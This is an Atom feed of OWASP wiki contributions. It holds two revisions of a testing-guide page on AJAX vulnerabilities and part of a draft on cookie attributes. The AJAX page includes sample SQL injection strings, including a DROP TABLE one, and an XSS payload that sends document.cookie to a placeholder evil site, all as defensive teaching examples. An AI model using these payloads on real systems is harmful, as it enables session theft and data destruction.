<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
		<id>https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Bregolin</id>
		<title>OWASP - User contributions [en]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Bregolin"/>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php/Special:Contributions/Bregolin"/>
		<updated>2026-05-09T07:31:31Z</updated>
		<subtitle>User contributions</subtitle>
		<generator>MediaWiki 1.27.2</generator>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing_for_AJAX_Vulnerabilities_(OWASP-AJ-001)&amp;diff=37272</id>
		<title>Testing for AJAX Vulnerabilities (OWASP-AJ-001)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing_for_AJAX_Vulnerabilities_(OWASP-AJ-001)&amp;diff=37272"/>
				<updated>2008-08-26T13:52:19Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: /* Browser Based Attacks */  Modified wording, which was too strong &amp;quot;The web browsers we use have not been designed with security in mind&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:OWASP Testing Guide v3}}&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
'''Asynchronous Javascript and XML (AJAX)''' is one of the latest techniques used by web application developers to provide a user experience similar to that of a traditional (i.e., &amp;quot;pre-web&amp;quot;) application. Since AJAX is still a new technology, there are many security issues that have not yet been fully researched. Some of the security issues in AJAX include:&lt;br /&gt;
&lt;br /&gt;
* Increased attack surface with many more inputs to secure&lt;br /&gt;
* Exposed internal functions of the application&lt;br /&gt;
* Client access to third-party resources with no built-in security and encoding mechanisms&lt;br /&gt;
* Failure to protect authentication information and sessions&lt;br /&gt;
* Blurred line between client-side and server-side code, possibly resulting in security mistakes&lt;br /&gt;
&lt;br /&gt;
== Attacks and Vulnerabilities == &lt;br /&gt;
&lt;br /&gt;
===XMLHttpRequest Vulnerabilities===&lt;br /&gt;
&lt;br /&gt;
AJAX uses the XMLHttpRequest(XHR) object for all communication with a server-side application, frequently a web service. A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation ([http://www.json.org JSON]), image data, or anything else that Javascript can process.&amp;lt;p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Secondly, in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence, the login data is traversing the wire in clear text. Using secure HTTPS/SSLchannels  which the modern day browsers support is the easiest way to prevent such attacks from happening.&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks such as SQL Injection, Cross Site Scripting(XSS), etc.&lt;br /&gt;
&lt;br /&gt;
===Increased Attack Surface===&lt;br /&gt;
&lt;br /&gt;
Unlike traditional web applications that execute completely on the server, AJAX applications extend across the client and server, which gives the client some powers. This throws in additional ways to potentially inject malicious content.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===SQL Injection===&lt;br /&gt;
&lt;br /&gt;
SQL Injection attacks (see [[Testing_for_SQL_Injection]]) are remote attacks on the database in which the attacker modifies SQL statements before they are processed by the DBMS. &amp;lt;br&amp;gt; Typical SQL Injection attacks could be as follows (examples refer to Microsoft SQL Server)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*'''''Example 1'''''&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
This query will always return one row (unless the table is empty), and it is likely to be the first entry in the table. For many applications, that entry is the administrative login - the one with the most privileges.&amp;lt;br&amp;gt;&lt;br /&gt;
Note. The code fragment above tries to match userid and password values (obtained in input) with attributes ''name'', ''pass'' of ''users''; consequently, it appears that ''users'' is storing passwords in clear text, a practice which is not recommendable.&amp;lt;br&amp;gt;&lt;br /&gt;
*'''''Example 2'''''&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
The above set of SQL statements drops the table ''users'', causing a Denial of Service. This consequence is possible on DBMS allowing concatenation of multiple statements.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Cross Site Scripting===&lt;br /&gt;
&lt;br /&gt;
Cross Site Scripting is a technique by which malicious content is injected in form of HTML/Javascripts code. XSS exploits can be used for triggering various other attacks like cookie theft, account hijacking, phishing and denial of service.&lt;br /&gt;
&lt;br /&gt;
The Browser and AJAX Requests look identical, so the server is not able to classify them. Consequently, it won't be able to discern who made the request in the background. A JavaScript program can use AJAX to request for a resource that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information such as cookies to the request. JavaScript code can then access the response to this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site Scripting (XSS) attack.&lt;br /&gt;
&lt;br /&gt;
Also, a XSS attack could send requests for specific pages other than the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.&lt;br /&gt;
&lt;br /&gt;
The XSS payload can use AJAX requests to autonomously inject itself into pages and easily re-inject the same host with more XSS (like a virus), all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods to propagate itself invisibly to the user. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*'''''Examples''''' &lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;lt;script&amp;gt;alert(&amp;quot;howdy&amp;quot;)&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;script&amp;gt;document.location='http://www.example.com/pag.pl?'%20+document.cookie&amp;lt;/script&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''Usage:''&lt;br /&gt;
&amp;lt;pre&amp;gt;http://example.com/login.php?variable=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;document.location='http://&amp;lt;evil-site&amp;gt;/cont.php?'+document.cookie&amp;lt;/script&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
This will just redirect the page to an unknown and malicious page after logging into the original page from where the request was made.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Client Side Injection Threats===&lt;br /&gt;
&lt;br /&gt;
* ''XSS exploits'' can give access to sensitive client-side data, and can also modify client-side code.&lt;br /&gt;
* ''DOM Injection'' is a type pf XSS injection which happens through the sub-objects ,document.location, document.URL, or document.referrer of the Document Object Model(DOM)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT&amp;gt;&lt;br /&gt;
var pos=document.URL.indexOf(&amp;quot;name=&amp;quot;)+5;&lt;br /&gt;
document.write(document.URL.substring(pos,document.URL.length));&lt;br /&gt;
&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* ''JSON/XML/XSLT Injection'' - Injection of malicious code in the XML content&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===AJAX Bridging===&lt;br /&gt;
&lt;br /&gt;
For security purposes, AJAX applications can only connect back to the Website from which they come. For example, JavaScript with AJAX downloaded from ''site1.com'' cannot make connections to ''site2.com''. To allow AJAX to contact third-party sites in this manner, the AJAX service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site. A bridge could be considered a 'Web service to Web service' connection. An attacker could use this to access sites with restricted access.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Cross Site Request Forgery(CSRF)===&lt;br /&gt;
&lt;br /&gt;
CSRF (see [[Testing for CSRF]]) attacks occur when an attacker forces a victim’s web browser to send an HTTP request to any website of his choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. In case such applications are vulnerable, invisibly, CSRF could have transferred funds, posted comments, compromised email lists, or reconfigured the network. A characteristic of CSRF attacks is that the vulnerable application logs' will show what appear as legitimate entries originating from the victim, bearing no trace of the attack. This attack, though not common, has been done before. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Denial of Service===&lt;br /&gt;
&lt;br /&gt;
Denial of Service is an old attack in which an attacker or vulnerable application forces the user to launch multiple XMLHttpRequests to a target application against the wishes of the user. In fact, browser domain restrictions make XMLHttpRequests useless in launching such attacks on other domains. Simple tricks such as using image tags nested within a JavaScript loop can do the trick more effectively. AJAX, being on the client-side, makes the attack easier.&amp;lt;pre&amp;gt;&amp;lt;IMG SRC=&amp;quot;http://example.com/cgi-bin/ouch.cgi?a=b&amp;quot;&amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
===Memory leaks===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Browser Based Attacks===&lt;br /&gt;
&lt;br /&gt;
The security of web browsers depends to a great extent to the fact that these tools integrate disparate technologies (such as HTML, Javascript, DNS, to name a few), whose interoperability has often been achieved without focusing much on its security implications. Furthermore, most of the security features available in browsers are based on previous attacks, so our browsers are not prepared for newer attacks.&lt;br /&gt;
&lt;br /&gt;
There have been a number of new attacks on browsers, such as using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These could be computers that serve Web pages, but they could also include routers, printers, IP phones, and other networked devices or applications that have a Web interface. The JavaScript scanner determines whether there is a computer at an IP address by sending a &amp;quot;ping&amp;quot; using JavaScript &amp;quot;image&amp;quot; objects. It then determines which servers are running by looking for image files stored in standard places and analyzing the traffic and error messages it receives back. &lt;br /&gt;
&lt;br /&gt;
Attacks that target Web browser and Web application vulnerabilities are often conducted by HTTP and, therefore, may bypass filtering mechanisms in place on the network perimeter. In addition, the widespread deployment of Web applications and Web browsers gives attackers a large number of easily exploitable targets. For example, Web browser vulnerabilities can lead to the exploitation of vulnerabilities in operating system components and individual applications, which can lead to the installation of malicious code, including bots.&lt;br /&gt;
&lt;br /&gt;
== Major Attacks  ==&lt;br /&gt;
&lt;br /&gt;
'''MySpace Attack'''&lt;br /&gt;
&lt;br /&gt;
The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site. In the case of Samy (see [http://namb.la/popular/tech.html Technical explanation of The MySpace Worm]), MySpace input validation controls prevent the injection of ''&amp;lt;SCRIPT&amp;gt;'' tags, however failed to consider all HTML tags, such as ''DIV''. The article is a good example demonstrating how hard it is to perform input validation (particularly if you try to do it following a ''black list'' based approach). AJAX was used to inject a worm into the MySpace profile of any user viewing infected page and forced any user viewing the infected page to add the user “Samy” to his friend list. It also appended the words “Samy is my hero” to the victim's profile&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Yahoo! Mail Attack'''&lt;br /&gt;
&lt;br /&gt;
In June 2006, the Yamanner worm infected Yahoo's mail service. The worm, using XSS and AJAX, took advantage of a vulnerability in Yahoo Mail's onload event handling. When an infected email was opened, the worm code executed its JavaScript, sending a copy of itself to all the Yahoo contacts of the infected user. The infected email carried a spoofed 'From' address picked randomly from the infected system, which made it look like an email from a known user.&lt;br /&gt;
&lt;br /&gt;
== References == &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Whitepapers'''&lt;br /&gt;
&lt;br /&gt;
* Brian Chess, Yekaterina Tsipenyuk O'Neil, Jacob West, &amp;quot;JavaScript Hijacking&amp;quot; - http://www.fortify.com/servlet/downloads/public/JavaScript_Hijacking.pdf&amp;lt;br&amp;gt;&lt;br /&gt;
* Billy Hoffman, &amp;quot;Ajax(in) Security&amp;quot; - http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman.pdf &amp;lt;br&amp;gt;&lt;br /&gt;
* Billy Hoffman, &amp;quot;Analysis of Web Application Worms and Viruses - http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman_web.pdf &amp;quot;,SPI Labs&amp;lt;br&amp;gt;&lt;br /&gt;
* Billy Hoffman, &amp;quot;Ajax Security Dangers&amp;quot; - http://www.spidynamics.com/assets/documents/AJAXdangers.pdf &amp;quot;,SPI Labs&amp;lt;br&amp;gt;&lt;br /&gt;
* “Ajax: A New Approach to Web Applications”, Adaptive Path - http://www.adaptivepath.com/publications/essays/archives/000385.php Jesse James Garrett&amp;lt;br&amp;gt;&lt;br /&gt;
* http://en.wikipedia.org/wiki/AJAX AJAX&amp;lt;br&amp;gt;&lt;br /&gt;
* http://ajaxpatterns.org AJAX Patterns &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP AJAX Security Project]]&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing_for_AJAX_Vulnerabilities_(OWASP-AJ-001)&amp;diff=37271</id>
		<title>Testing for AJAX Vulnerabilities (OWASP-AJ-001)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing_for_AJAX_Vulnerabilities_(OWASP-AJ-001)&amp;diff=37271"/>
				<updated>2008-08-26T13:41:54Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: Several corrections and clarifications, following email exchange with M. Meucci&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:OWASP Testing Guide v3}}&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
'''Asynchronous Javascript and XML (AJAX)''' is one of the latest techniques used by web application developers to provide a user experience similar to that of a traditional (i.e., &amp;quot;pre-web&amp;quot;) application. Since AJAX is still a new technology, there are many security issues that have not yet been fully researched. Some of the security issues in AJAX include:&lt;br /&gt;
&lt;br /&gt;
* Increased attack surface with many more inputs to secure&lt;br /&gt;
* Exposed internal functions of the application&lt;br /&gt;
* Client access to third-party resources with no built-in security and encoding mechanisms&lt;br /&gt;
* Failure to protect authentication information and sessions&lt;br /&gt;
* Blurred line between client-side and server-side code, possibly resulting in security mistakes&lt;br /&gt;
&lt;br /&gt;
== Attacks and Vulnerabilities == &lt;br /&gt;
&lt;br /&gt;
===XMLHttpRequest Vulnerabilities===&lt;br /&gt;
&lt;br /&gt;
AJAX uses the XMLHttpRequest(XHR) object for all communication with a server-side application, frequently a web service. A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation ([http://www.json.org JSON]), image data, or anything else that Javascript can process.&amp;lt;p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Secondly, in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence, the login data is traversing the wire in clear text. Using secure HTTPS/SSLchannels  which the modern day browsers support is the easiest way to prevent such attacks from happening.&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks such as SQL Injection, Cross Site Scripting(XSS), etc.&lt;br /&gt;
&lt;br /&gt;
===Increased Attack Surface===&lt;br /&gt;
&lt;br /&gt;
Unlike traditional web applications that execute completely on the server, AJAX applications extend across the client and server, which gives the client some powers. This throws in additional ways to potentially inject malicious content.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===SQL Injection===&lt;br /&gt;
&lt;br /&gt;
SQL Injection attacks (see [[Testing_for_SQL_Injection]]) are remote attacks on the database in which the attacker modifies SQL statements before they are processed by the DBMS. &amp;lt;br&amp;gt; Typical SQL Injection attacks could be as follows (examples refer to Microsoft SQL Server)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*'''''Example 1'''''&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
This query will always return one row (unless the table is empty), and it is likely to be the first entry in the table. For many applications, that entry is the administrative login - the one with the most privileges.&amp;lt;br&amp;gt;&lt;br /&gt;
Note. The code fragment above tries to match userid and password values (obtained in input) with attributes ''name'', ''pass'' of ''users''; consequently, it appears that ''users'' is storing passwords in clear text, a practice which is not recommendable.&amp;lt;br&amp;gt;&lt;br /&gt;
*'''''Example 2'''''&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
The above set of SQL statements drops the table ''users'', causing a Denial of Service. This consequence is possible on DBMS allowing concatenation of multiple statements.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Cross Site Scripting===&lt;br /&gt;
&lt;br /&gt;
Cross Site Scripting is a technique by which malicious content is injected in form of HTML/Javascripts code. XSS exploits can be used for triggering various other attacks like cookie theft, account hijacking, phishing and denial of service.&lt;br /&gt;
&lt;br /&gt;
The Browser and AJAX Requests look identical, so the server is not able to classify them. Consequently, it won't be able to discern who made the request in the background. A JavaScript program can use AJAX to request for a resource that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information such as cookies to the request. JavaScript code can then access the response to this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site Scripting (XSS) attack.&lt;br /&gt;
&lt;br /&gt;
Also, a XSS attack could send requests for specific pages other than the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.&lt;br /&gt;
&lt;br /&gt;
The XSS payload can use AJAX requests to autonomously inject itself into pages and easily re-inject the same host with more XSS (like a virus), all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods to propagate itself invisibly to the user. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*'''''Examples''''' &lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;lt;script&amp;gt;alert(&amp;quot;howdy&amp;quot;)&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;script&amp;gt;document.location='http://www.example.com/pag.pl?'%20+document.cookie&amp;lt;/script&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''Usage:''&lt;br /&gt;
&amp;lt;pre&amp;gt;http://example.com/login.php?variable=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;document.location='http://&amp;lt;evil-site&amp;gt;/cont.php?'+document.cookie&amp;lt;/script&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
This will just redirect the page to an unknown and malicious page after logging into the original page from where the request was made.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Client Side Injection Threats===&lt;br /&gt;
&lt;br /&gt;
* ''XSS exploits'' can give access to sensitive client-side data, and can also modify client-side code.&lt;br /&gt;
* ''DOM Injection'' is a type pf XSS injection which happens through the sub-objects ,document.location, document.URL, or document.referrer of the Document Object Model(DOM)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT&amp;gt;&lt;br /&gt;
var pos=document.URL.indexOf(&amp;quot;name=&amp;quot;)+5;&lt;br /&gt;
document.write(document.URL.substring(pos,document.URL.length));&lt;br /&gt;
&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* ''JSON/XML/XSLT Injection'' - Injection of malicious code in the XML content&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===AJAX Bridging===&lt;br /&gt;
&lt;br /&gt;
For security purposes, AJAX applications can only connect back to the Website from which they come. For example, JavaScript with AJAX downloaded from ''site1.com'' cannot make connections to ''site2.com''. To allow AJAX to contact third-party sites in this manner, the AJAX service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site. A bridge could be considered a 'Web service to Web service' connection. An attacker could use this to access sites with restricted access.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Cross Site Request Forgery(CSRF)===&lt;br /&gt;
&lt;br /&gt;
CSRF (see [[Testing for CSRF]]) attacks occur when an attacker forces a victim’s web browser to send an HTTP request to any website of his choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. In case such applications are vulnerable, invisibly, CSRF could have transferred funds, posted comments, compromised email lists, or reconfigured the network. A characteristic of CSRF attacks is that the vulnerable application logs' will show what appear as legitimate entries originating from the victim, bearing no trace of the attack. This attack, though not common, has been done before. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Denial of Service===&lt;br /&gt;
&lt;br /&gt;
Denial of Service is an old attack in which an attacker or vulnerable application forces the user to launch multiple XMLHttpRequests to a target application against the wishes of the user. In fact, browser domain restrictions make XMLHttpRequests useless in launching such attacks on other domains. Simple tricks such as using image tags nested within a JavaScript loop can do the trick more effectively. AJAX, being on the client-side, makes the attack easier.&amp;lt;pre&amp;gt;&amp;lt;IMG SRC=&amp;quot;http://example.com/cgi-bin/ouch.cgi?a=b&amp;quot;&amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
===Memory leaks===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Browser Based Attacks===&lt;br /&gt;
&lt;br /&gt;
The web browsers we use have not been designed with security in mind. Most of the security features available in the browsers are based on the previous attacks, so our browsers are not prepared for newer attacks.&lt;br /&gt;
&lt;br /&gt;
There have been a number of new attacks on browsers, such as using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These could be computers that serve Web pages, but they could also include routers, printers, IP phones, and other networked devices or applications that have a Web interface. The JavaScript scanner determines whether there is a computer at an IP address by sending a &amp;quot;ping&amp;quot; using JavaScript &amp;quot;image&amp;quot; objects. It then determines which servers are running by looking for image files stored in standard places and analyzing the traffic and error messages it receives back. &lt;br /&gt;
&lt;br /&gt;
Attacks that target Web browser and Web application vulnerabilities are often conducted by HTTP and, therefore, may bypass filtering mechanisms in place on the network perimeter. In addition, the widespread deployment of Web applications and Web browsers gives attackers a large number of easily exploitable targets. For example, Web browser vulnerabilities can lead to the exploitation of vulnerabilities in operating system components and individual applications, which can lead to the installation of malicious code, including bots.&lt;br /&gt;
&lt;br /&gt;
== Major Attacks  ==&lt;br /&gt;
&lt;br /&gt;
'''MySpace Attack'''&lt;br /&gt;
&lt;br /&gt;
The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site. In the case of Samy (see [http://namb.la/popular/tech.html Technical explanation of The MySpace Worm]), MySpace input validation controls prevent the injection of ''&amp;lt;SCRIPT&amp;gt;'' tags, however failed to consider all HTML tags, such as ''DIV''. The article is a good example demonstrating how hard it is to perform input validation (particularly if you try to do it following a ''black list'' based approach). AJAX was used to inject a worm into the MySpace profile of any user viewing infected page and forced any user viewing the infected page to add the user “Samy” to his friend list. It also appended the words “Samy is my hero” to the victim's profile&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Yahoo! Mail Attack'''&lt;br /&gt;
&lt;br /&gt;
In June 2006, the Yamanner worm infected Yahoo's mail service. The worm, using XSS and AJAX, took advantage of a vulnerability in Yahoo Mail's onload event handling. When an infected email was opened, the worm code executed its JavaScript, sending a copy of itself to all the Yahoo contacts of the infected user. The infected email carried a spoofed 'From' address picked randomly from the infected system, which made it look like an email from a known user.&lt;br /&gt;
&lt;br /&gt;
== References == &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Whitepapers'''&lt;br /&gt;
&lt;br /&gt;
* Brian Chess, Yekaterina Tsipenyuk O'Neil, Jacob West, &amp;quot;JavaScript Hijacking&amp;quot; - http://www.fortify.com/servlet/downloads/public/JavaScript_Hijacking.pdf&amp;lt;br&amp;gt;&lt;br /&gt;
* Billy Hoffman, &amp;quot;Ajax(in) Security&amp;quot; - http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman.pdf &amp;lt;br&amp;gt;&lt;br /&gt;
* Billy Hoffman, &amp;quot;Analysis of Web Application Worms and Viruses - http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman_web.pdf &amp;quot;,SPI Labs&amp;lt;br&amp;gt;&lt;br /&gt;
* Billy Hoffman, &amp;quot;Ajax Security Dangers&amp;quot; - http://www.spidynamics.com/assets/documents/AJAXdangers.pdf &amp;quot;,SPI Labs&amp;lt;br&amp;gt;&lt;br /&gt;
* “Ajax: A New Approach to Web Applications”, Adaptive Path - http://www.adaptivepath.com/publications/essays/archives/000385.php Jesse James Garrett&amp;lt;br&amp;gt;&lt;br /&gt;
* http://en.wikipedia.org/wiki/AJAX AJAX&amp;lt;br&amp;gt;&lt;br /&gt;
* http://ajaxpatterns.org AJAX Patterns &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP AJAX Security Project]]&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing_for_cookies_attributes_(OTG-SESS-002)&amp;diff=33584</id>
		<title>Testing for cookies attributes (OTG-SESS-002)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing_for_cookies_attributes_(OTG-SESS-002)&amp;diff=33584"/>
				<updated>2008-07-07T10:39:11Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: Minor corrections affecting syntax.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:OWASP Testing Guide v3}}&lt;br /&gt;
&lt;br /&gt;
'''This is a draft of a section of the new Testing Guide v3'''&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Cookies are often a key attack vector for malicious users (typically targeting other users) and as such the application should always take due diligence to protect these cookies.  In this section we will look at how an application can take the necessary precautions when assigning cookies and how to test that these attributes have been correctly configured. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
The importance and secure use of Cookies cannot be understated, especially within dynamic web applications which need to maintain state across a stateless protocol such as HTTP.  To understand the importance of cookies it is imperative to understand what they are primarily used for.  These primary functions usually consist of being used as a session authorization/authentication token and/or as a temporary data container.  Thus if an attacker by some means were able to acquire a session token such as by cross site scripting (XSS) or sniffing an unencrypted session then he/she could use this cookie to hijack a valid current session.  Additionally cookies are set to maintain state across multiple requests.  Since HTTP is stateless the server can not determine if a request it receives is part of a current session or the start of a new session without some type of identifier.  This identifier is very commonly a cookie although not always.  As you can imagine there are many different types of applications that need to keep track of session state across multiple requests.  The primary one that comes to mind would be an online store.  As a user adds multiple items to a shopping cart this data needs to be retained in subsequent requests to the application.  Cookies are very commonly used for this task and are set by the application using the Set-Cookie directive in the applications HTTP response, and is usually in a name=value format (if cookies are enabled and if they are supported, which is the case for all modern web browsers).  Once an application has told the browser to use a particular cookie the browser will send this cookie in each subsequent request.  A cookie can contain data such as items from an online shopping cart, the price of these items, the quantity of these items, personal information, user IDs, etc.  Due to the sensitive nature of information in cookies they are typically encoded or encrypted in an attempt to protect this information.  Many times multiple cookies will be set (separated by a semicolon) upon subsequent requests especially in the case of an online store as you add multiple items to your shopping cart.  Additionally you will typically have a cookie for authentication (session token as indicated above) once you login and multiple other cookies used to identify the items you wish to purchase and their auxiliary information (i.e. price, quantity, etc) in the online store type of application.   &lt;br /&gt;
&lt;br /&gt;
Now that you have an understanding of how cookies are set, when they are set, what they are used for, why they are used, and their importance; let's take a look at what attributes can be set for a cookie and how to test if they are secure.  The following is a list of the attributes that can be set for each cookie and what they mean.  The next section will focus on how to test for each attribute.&lt;br /&gt;
&lt;br /&gt;
*secure - This attribute tells the browser to only send the cookie if the request is being sent over a secure channel such as HTTPS.  This will help protect the cookie from being passed over unencrypted requests.  &lt;br /&gt;
If the application can be accessed over both HTTP and HTTPS then there is the potential that the cookie can be sent in clear text.&lt;br /&gt;
&lt;br /&gt;
*HttpOnly - This attribute is used to help prevent attacks such as cross-site scripting since it does not allow the cookie to be accessed via a client side script such as JavaScript.  Note that not all browsers support this functionality.&lt;br /&gt;
&lt;br /&gt;
*domain -  This attribute is used to compare against the domain of the server in which the URL is being requested.  If the domain matches or if it is a sub-domain then the path attribute will be checked next.  &lt;br /&gt;
Note that only hosts within the specified domain can set a cookie for that domain.  Also the domain attribute can not be a top level domain (such as .gov or .com) to prevent against servers being able to set arbitrary cookies for another domain.  If domain attribute is not set then the default value of domain is set to the hostname of the server which generated the cookie. &lt;br /&gt;
